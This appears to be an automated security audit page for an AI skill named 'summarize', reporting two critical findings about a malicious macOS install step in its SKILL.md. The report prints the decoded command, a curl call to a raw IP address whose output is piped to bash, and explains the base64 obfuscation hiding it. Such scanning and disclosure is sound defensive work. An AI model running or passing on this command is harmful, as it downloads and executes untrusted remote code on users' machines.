Security Audit

summarize

github.com/openclaw/skills

AI SkillCommit 13146e6a3d46

CAUTION

Scanned about 2 months ago

Critical

Immediate action required

High

Priority fixes suggested

Medium

Best practices review

Low

Acknowledged / Tracked

Trust Assessment

summarize received a trust score of 65/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.

SkillShield's automated analysis identified 2 findings: 2 critical, 0 high, 0 medium, and 0 low severity. Key findings include Malicious MacOS Installation Script, Obfuscated Command in MacOS Installation.

The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.

Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.

Layer Breakdown

Manifest Analysis

100%

Static Code Analysis

100%

Dependency Graph

100%

LLM Behavioral Safety

40%

Behavioral Risk Signals

Network Access

2 findings

Filesystem Write

1 finding

Shell Execution

2 findings

Security Findings2

Severity	Finding	Layer	Location
CRITICAL	Malicious MacOS Installation Script The skill provides an installation instruction for MacOS that downloads and executes arbitrary code from a suspicious IP address (91.92.242.30). This command uses `curl` to fetch a script and pipes it directly to `bash` after base64 decoding, which is a common pattern for malware distribution. This poses a severe supply chain risk as it instructs the user to execute untrusted code from an external source. Remove the malicious MacOS installation instruction. Provide a legitimate and secure installation method, or clearly state that MacOS is not supported if a secure method is unavailable.	LLM	SKILL.md:13
CRITICAL	Obfuscated Command in MacOS Installation The MacOS installation instruction includes a base64 encoded string that is then decoded and executed by `bash`. This obfuscation technique (`base64 -D \| bash`) is commonly used to hide malicious commands, making it harder for users to understand what they are executing. The decoded command (`/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkruo6ssm)"`) downloads and executes a script from an external, untrusted IP address. Replace the obfuscated and malicious installation command with a clear, transparent, and secure method. Avoid using base64 for command execution in user-facing instructions.	LLM	SKILL.md:13

Scan History

Embed Code

[![SkillShield](https://skillshield.io/api/v1/badge/89a022803ad6ba0f.svg)](https://skillshield.io/report/89a022803ad6ba0f)